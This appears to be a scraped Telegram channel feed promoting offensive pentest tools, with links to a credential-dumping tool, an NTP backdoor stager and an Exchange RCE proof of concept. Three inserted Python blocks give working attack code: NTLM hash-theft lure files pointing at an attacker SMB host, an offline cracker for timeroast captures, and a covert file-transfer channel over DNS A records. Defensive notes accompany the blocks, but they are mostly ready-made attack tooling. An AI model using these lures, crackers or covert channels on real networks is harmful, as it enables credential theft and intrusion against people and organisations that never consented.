Network Penetration Testing – Telegram
Network Penetration Testing
1.03K subscribers
40 photos
3 videos
12 files
269 links
[ Network Penetration Testing & Cloud ]

Any misuse of this info will not be the responsibility of the author, educational purposes only.


@NetPentester
FarsightAD

A #PowerShell script that aims to help uncover (eventual) persistence mechanisms deployed by a threat actor following an Active Directory domain compromise.

The script produces CSV / JSON file exports of various objects and their attributes, enriched with timestamps from replication metadata. Additionally, if executed with replication privileges, the Directory Replication Service (DRS) protocol is leveraged to detect fully or partially hidden objects.

https://github.com/Qazeer/FarsightAD
#ad
@NetPentesters
ntlm_theft

A tool for generating multiple types of NTLMv2 hash theft files.
ntlm_theft is an open-source Python 3 tool that generates 21 different types of hash theft documents. These can be used for phishing when the target allows SMB traffic out of their network, or when you are already inside the internal network.

https://github.com/Greenwolf/ntlm_theft
#NTLM
@Netpentesters
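Added example, not ntlm_theft's own code: three of the classic lure formats built from scratch, plus a small scanner for the same trick from the defender's side. Each lure points Explorer at an attacker-controlled UNC path; when Explorer renders the icon it opens an SMB session to that host and the client authenticates with an NTLMv2 response that a listener such as Responder can capture. The host, share and file names are placeholders chosen for this example.

```python
"""Added example (not ntlm_theft's own code): generate NTLM hash-theft lure files
and scan file content for the UNC references such lures rely on.

Host, share and icon names are placeholders for this example.
"""
import re
from pathlib import Path
from typing import Dict, List


def _unc(host: str, share: str, icon: str) -> str:
    return f"\\\\{host}\\{share}\\{icon}"


def url_lure(host: str, share: str = "share", icon: str = "icon.ico") -> str:
    # Internet Shortcut: Explorer fetches IconFile over SMB when the folder is displayed.
    return "\r\n".join([
        "[InternetShortcut]",
        f"URL=file://{host}/{share}/",
        "IconIndex=1",
        f"IconFile={_unc(host, share, icon)}",
        "",
    ])


def scf_lure(host: str, share: str = "share", icon: str = "icon.ico") -> str:
    # Shell Command File: older Windows builds resolved IconFile automatically;
    # current builds no longer do, so treat this one as internal-network only.
    return "\r\n".join([
        "[Shell]",
        "Command=2",
        f"IconFile={_unc(host, share, icon)}",
        "[Taskbar]",
        "Command=ToggleDesktop",
        "",
    ])


def desktop_ini_lure(host: str, share: str = "share", icon: str = "icon.ico") -> str:
    # desktop.ini is only honoured when the containing folder carries the
    # read-only or system attribute, so the dropper has to set that too.
    return "\r\n".join([
        "[.ShellClassInfo]",
        f"IconResource={_unc(host, share, icon)},0",
        "",
    ])


def build_lures(host: str, share: str = "share", icon: str = "icon.ico") -> Dict[str, str]:
    return {
        "lure.url": url_lure(host, share, icon),
        "lure.scf": scf_lure(host, share, icon),
        "desktop.ini": desktop_ini_lure(host, share, icon),
    }


def write_lures(outdir: str, host: str, share: str = "share", icon: str = "icon.ico") -> List[Path]:
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    written = []
    for name, body in build_lures(host, share, icon).items():
        path = out / name
        path.write_bytes(body.encode("utf-8"))  # keep the CRLF line endings as written
        written.append(path)
    return written


# Defensive side: the INI keys that make Explorer touch a remote path.
_UNC_FIELD = re.compile(r"(?im)^(?:IconFile|IconResource|URL)\s*=\s*((?:\\\\|file://)[^\r\n,]+)")


def find_unc_lures(content: str) -> List[str]:
    """Return every UNC / file:// target a .url, .scf or desktop.ini would contact."""
    return [m.group(1).strip() for m in _UNC_FIELD.finditer(content)]


if __name__ == "__main__":
    for name, body in build_lures("10.10.10.10").items():
        print(name, "->", find_unc_lures(body))
```

A mail gateway or EDR rule that applies find_unc_lures to attachments and dropped INI-style files catches all three variants with one regex; the hard part in the field is that the same keys are also used legitimately by shortcuts pointing at internal file servers, so alert on hosts outside the corporate address space rather than on the key alone.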
Sandman

Sandman is a backdoor meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (the protocol used to sync time and date) to download arbitrary shellcode from a predefined server.

Because NTP is a protocol that many defenders overlook, it is usually reachable across the network.

https://github.com/Idov31/Sandman
#redteam
@Netpentesters
⭐️ Privileger

Privileger allows you to work with privileges in Windows as easily as possible. There are three modes:

— Add privileges to an account;
— Start a process by adding a specific privilege to its token;
— Remove privilege from the user.

Thanks to:
@Michaelzhm

https://github.com/MzHmO/Privileger

#ad #windows #privilege #lsa
@netpentesters
Friends, if you have an idea to improve the channel, share it with us.
@ChatNPTbot
Clouditor Community Edition

Clouditor is a tool which supports continuous cloud assurance. Its main goal is to continuously evaluate if a cloud-based application (built using, e.g., Amazon Web Services (AWS) or Microsoft Azure) is configured in a secure way and thus complies with security requirements defined by, e.g., Cloud Computing Compliance Controls Catalogue (C5) issued by the German Office for Information Security (BSI) or the Cloud Control Matrix (CCM) published by the Cloud Security Alliance (CSA).

https://github.com/clouditor/clouditor
#azure #aws
@netpentesters
Masky

A Python library providing an alternative way to remotely dump domain users' credentials via AD CS. A command-line tool has been built on top of this library to easily gather PFX files, NT hashes and TGTs at scale.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Instead, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via Kerberos, and NT hash retrieval via PKINIT).

A blog post was published to detail the implemented techniques and how Masky works.

https://github.com/Z4kSec/Masky

#ad #adcs #lsass #redteam
@Netpentesters
Systematization of attacks on the perimeter of L2/L3 network equipment. Ver. 3.0.

V 2.0
#Analytics
#attack
@netpentesters
Active Directory ACEs abuse mindmap

#pentest #redteam #ad #mindmap
@Netpentesters
Exchange TabShell RCE PoC (CVE-2022-41076)

+ Microsoft #Exchange: OWASSRF + TabShell (CVE-2022-41076)

The TabShell vulnerability is a form of #Privilege Escalation that allows breaking out of the restricted #PowerShell sandbox after you have successfully gained access through OWASSRF.

https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e

Details:
https://blog.viettelcybersecurity.com/tabshell-owassrf/

#Exchange
#ssrf
#tabshell
#poc
@NetPentesters
WP_Timeroasting_v3.pdf
1.5 MB
#Whitepaper
"Timeroasting, Trustroasting and Computer Spraying: Taking advantage of weak computer and trust account passwords in Active Directory".

Timeroasting scripts:
https://github.com/SecuraBV/Timeroast

#AD
@NetPentesters
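Added example, not Secura's timeroast.py or timecrack.py: an offline check of candidate passwords against captured MS-SNTP authenticators. The whitepaper's point is that a DC answers an MS-SNTP request carrying a computer account's RID with a reply whose 16-byte MAC is MD5 over the account's NT hash (MD4 of the UTF-16LE password) concatenated with the 48-byte NTP reply, so anyone on the network can collect crackable material without credentials. The "rid:$sntp-ms$<mac hex>$<reply hex>" line layout is assumed here (it is the one timeroast.py emits and hashcat mode 31300 consumes); adjust parse_line if your capture differs. MD4 is implemented inline because OpenSSL 3 builds of hashlib often refuse it.

```python
"""Added example (not Secura's timeroast.py / timecrack.py): offline verification
of timeroast captures. Line layout "rid:$sntp-ms$<mac>$<ntp reply>" is assumed.
"""
import hashlib
import struct
from typing import Dict, Iterable, Tuple

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: little-endian words, three rounds of sixteen steps."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + f(b, c, d) + X[j] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate roles; back in place every 4 steps
        h = [(v + w) & _MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE password); what the DC keys the MAC with."""
    return md4(password.encode("utf-16le"))


def ms_sntp_mac(nthash: bytes, ntp_reply: bytes) -> bytes:
    """Authenticator appended to the DC's reply: MD5(NT hash || 48-byte NTP reply)."""
    return hashlib.md5(nthash + ntp_reply).digest()


def parse_line(line: str) -> Tuple[int, bytes, bytes]:
    rid, rest = line.strip().split(":", 1)
    tag, mac_hex, salt_hex = rest.split("$")[1:]   # "$sntp-ms$mac$salt"
    if tag != "sntp-ms":
        raise ValueError(f"unexpected hash tag {tag!r}")
    return int(rid), bytes.fromhex(mac_hex), bytes.fromhex(salt_hex)


def check_candidate(line: str, password: str) -> bool:
    _, mac, salt = parse_line(line)
    return ms_sntp_mac(nt_hash(password), salt) == mac


def crack(lines: Iterable[str], wordlist: Iterable[str]) -> Dict[int, str]:
    """Return {rid: password} for every capture matched by some candidate.
    The NT hash is computed once per candidate and reused across all captures,
    which is why default computer passwords and trust passwords fall quickly."""
    parsed = [parse_line(ln) for ln in lines if ln.strip()]
    found: Dict[int, str] = {}
    for pw in wordlist:
        nth = nt_hash(pw)
        for rid, mac, salt in parsed:
            if rid not in found and ms_sntp_mac(nth, salt) == mac:
                found[rid] = pw
    return found


def make_line(rid: int, password: str, ntp_reply: bytes) -> str:
    """Build a capture line for a known password (constructed test data only)."""
    return f"{rid}:$sntp-ms${ms_sntp_mac(nt_hash(password), ntp_reply).hex()}${ntp_reply.hex()}"


if __name__ == "__main__":
    reply = bytes(range(48))   # constructed stand-in for a real 48-byte NTP reply
    captures = [make_line(1105, "Summer2023!", reply), make_line(1337, "not-in-list", reply)]
    print(crack(captures, ["password", "Summer2023!", "Welcome1"]))
```

For a real engagement the collection side still needs a UDP/123 listener and the RID sweep the Secura scripts implement; what this block shows is the cheap part of the attack, a single MD4 plus MD5 per guess with no salting beyond the public NTP reply. On the blue side, the check to run is the same loop against your own captures with the default and trust-account password patterns from the whitepaper, then rotate any computer or trust account that falls.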
[CVE49] Microsoft Windows LNK Remote Code Execution Vulnerability - CVE-2020-1299

File Explorer, previously known as Windows Explorer, is a file manager application that has been included with releases of the Microsoft Windows operating system from Windows 95 onwards. It provides a graphical user interface for accessing the file systems. It is also the component of the operating system that presents many user interface items on the screen such as the taskbar and desktop.

Explorer has a lot of features, and Microsoft has upgraded it in each version of the operating system. Here I discovered that Explorer will automatically parse the LNK file if the LNK file appears in the context that Explorer is accessing. For example, if we are on the desktop, Explorer will parse the LNK files that appear on the desktop and maybe in some secondary directory (about the depth of the folder that Explorer can access, I don't know).

https://blog.vincss.net/2020/06/cve49-microsoft-windows-lnk-remote-code-execution-vuln-cve-2020-1299-eng.html?m=1

@NetPentesters
pfSense as an OpenVPN client for specific devices

One of the most powerful features of pfSense is its ability to direct your data requests through different end-points using NAT rules. pfSense is amazing as an OpenVPN client because it can selectively route any device on the network through the VPN service (i.e., my tablets and TV go through US servers, while my smartphone, VoIP and computers go through my local ISP).
This setup becomes extremely handy for use with applications which are not aware of the OpenVPN protocol, e.g. download managers, torrent clients, etc. If you expect privacy, you should be sure that traffic won't go through your ISP's gateway in case of a failure on the VPN provider's side. And obviously the OpenVPN client should automatically reconnect as soon as the service goes live again.
https://gist.github.com/InQuize/59e7c458c510ae779743
#Pfsense
@Netpentesters
Have you ever wanted to transfer files over DNS A records? No? Well too bad lol, I've updated @domchell's PowerDNS to do that along with some other things. Could be useful for pentests with no standard outbound access... which yes I get quite a bit of.
https://github.com/icyguider/NewPowerDNS
#DNS
@NetPentesters
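Added example, not NewPowerDNS's own encoding: a minimal scheme for moving a file through DNS A records and reassembling it on the client, to show what "transfer over A records" means in practice. Each A record carries four payload bytes disguised as an IPv4 address; the numeric first label of the query name is the chunk index, so answers can arrive in any order and the client knows how many to ask for. Records 0 and 1 hold a header (payload length and CRC32) so a truncated or poisoned answer is noticed. The zone name and the in-memory resolver are placeholders for this example.

```python
"""Added example (not NewPowerDNS's format): file transfer over DNS A records.
Zone name and the dict-backed resolver are placeholders for this example.
"""
import ipaddress
import struct
import zlib
from typing import Callable, Dict, List, Tuple

HEADER = struct.Struct(">II")   # payload length, CRC32 of payload


def encode_to_a_records(data: bytes, zone: str) -> List[Tuple[str, str]]:
    """Server side: (query name, dotted IPv4) pairs, four payload bytes per record."""
    blob = HEADER.pack(len(data), zlib.crc32(data)) + data
    blob += b"\x00" * (-len(blob) % 4)            # pad to whole records
    return [
        (f"{i}.{zone}", str(ipaddress.IPv4Address(blob[4 * i:4 * i + 4])))
        for i in range(len(blob) // 4)
    ]


def _packed(ip: str) -> bytes:
    return ipaddress.IPv4Address(ip).packed


def _total_records(length: int) -> int:
    return (HEADER.size + length + 3) // 4


def decode_a_records(records: Dict[int, str]) -> bytes:
    """Client side: chunk index -> dotted IPv4, in any order; verifies length and CRC."""
    if 0 not in records or 1 not in records:
        raise ValueError("header records missing")
    length, crc = HEADER.unpack(_packed(records[0]) + _packed(records[1]))
    total = _total_records(length)
    missing = [i for i in range(total) if i not in records]
    if missing:
        raise ValueError(f"missing chunks: {missing[:5]}")
    blob = b"".join(_packed(records[i]) for i in range(total))
    data = blob[HEADER.size:HEADER.size + length]
    if zlib.crc32(data) != crc:
        raise ValueError("CRC mismatch: payload truncated, corrupted or tampered")
    return data


def fetch_over_dns(zone: str, resolve: Callable[[str], str]) -> bytes:
    """Pull the header first, then exactly the number of chunks it announces.
    `resolve` stands in for an A-record lookup (e.g. a real resolver call)."""
    got = {i: resolve(f"{i}.{zone}") for i in (0, 1)}
    length, _ = HEADER.unpack(_packed(got[0]) + _packed(got[1]))
    for i in range(2, _total_records(length)):
        got[i] = resolve(f"{i}.{zone}")
    return decode_a_records(got)


if __name__ == "__main__":
    payload = b"#!/bin/sh\necho constructed sample payload\n"   # constructed input
    zone_db = dict(encode_to_a_records(payload, "files.example.test"))  # what the server serves
    print(fetch_over_dns("files.example.test", zone_db.__getitem__) == payload)
```

Two practical notes on this channel: resolver caching means each transfer needs a unique label prefix (or short TTLs), and the addresses that fall out of raw bytes (0.0.0.5, 255.x.x.x, multicast ranges) look nothing like real hosts, so a DNS log review that flags A answers in bogon space will spot this quickly. The CRC only catches accidental damage; if an on-path attacker is in scope, replace it with a keyed MAC.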